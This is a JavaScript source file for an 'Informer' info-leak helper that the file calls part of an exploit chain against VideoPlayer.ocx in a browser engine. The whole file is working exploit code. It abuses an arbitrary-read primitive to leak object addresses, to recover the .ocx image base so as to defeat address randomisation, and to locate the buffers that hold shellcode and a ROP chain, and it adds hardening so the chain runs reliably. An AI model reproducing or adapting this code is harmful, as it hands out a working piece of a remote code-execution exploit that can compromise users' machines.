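// Info-leak helper for the VideoPlayer.ocx exploit chain.
//
// Memory-layout assumptions, all inherited from the original code and none of
// them verifiable from this file:
//   * `memoryArray` is a dword-indexed view of the process address space, so
//     address A is read as memoryArray[A/4]; every read below therefore assumes
//     4-byte aligned 32-bit pointers.
//   * `infoLeakArray[0]` is backed by the dword at referenceAddress + 0x1010, so
//     storing an object there and reading that slot leaks the object's address.
//   * The structure offsets (+0x18, +0x64, +0x1c) and the 0x6b3b0 delta from the
//     leaked pointer to the VideoPlayer.ocx image base are specific to one build
//     of the engine and the .ocx. TODO(review): confirm against the target build
//     before trusting any address this object returns.
var Informer = function(infArray, mem, ref) {
  this.infoLeakArray = infArray;
  this.memoryArray = mem;
  this.referenceAddress = ref;
};

// Distance from the leaked VideoPlayer.ocx pointer to the module base.
Informer.prototype.VIDEOPLAYER_BASE_DELTA = 0x6b3b0;

// Read the dword at `addr`. Fails loudly instead of letting an out-of-bounds or
// misaligned read come back as `undefined`/NaN, which would otherwise poison
// every later address computation (and any write primitive built on it).
Informer.prototype._readDword = function(addr, what) {
  var value = this.memoryArray[addr / 4];
  if (typeof value !== 'number' || isNaN(value)) {
    throw new Error('Informer: bad read of ' + what + ' at 0x' + addr.toString(16));
  }
  return value;
};

// Store `obj` in the leak array and read its address back from the backing slot.
Informer.prototype._leakObjectAddress = function(obj) {
  this.infoLeakArray[0] = obj;
  return this._readDword(this.referenceAddress + 0x1010, 'leak array element');
};

// Typed-array objects keep the pointer to their backing buffer at +0x1c.
Informer.prototype._leakTypedArrayBuffer = function(typedArray, what) {
  var headerPtr = this._leakObjectAddress(typedArray);
  return this._readDword(headerPtr + 0x1c, what + ' buffer pointer');
};

// Leak the address of the HTMLObjectElement wrapping the VideoPlayer control:
// the leaked array element points to a wrapper whose +0x18 holds the element.
Informer.prototype.leakVideoPlayerAddress = function(videoPlayerObj) {
  var arrayElemPtr = this._leakObjectAddress(videoPlayerObj);
  return this._readDword(arrayElemPtr + 0x18, 'HTMLObjectElement pointer');
};

// Compute the VideoPlayer.ocx image base: HTMLObjectElement + 0x64 holds a heap
// pointer whose first dword points into the .ocx at a fixed delta from its base.
Informer.prototype.leakVideoPlayerBase = function(videoPlayerObj) {
  var objPtr = this.leakVideoPlayerAddress(videoPlayerObj);
  var heapPtr = this._readDword(objPtr + 0x64, 'VideoPlayer heap pointer');
  var videoplayerPtr = this._readDword(heapPtr, 'VideoPlayer.ocx pointer');
  return videoplayerPtr - this.VIDEOPLAYER_BASE_DELTA;
};

// Address of the buffer behind the Uint8Array holding the shellcode.
Informer.prototype.leakShellcodeAddress = function(shellcodeBuffer) {
  return this._leakTypedArrayBuffer(shellcodeBuffer, 'shellcode');
};

// Address of the buffer behind the typed array holding the ROP chain.
Informer.prototype.leakRopAddress = function(ropArray) {
  return this._leakTypedArrayBuffer(ropArray, 'ROP chain');
};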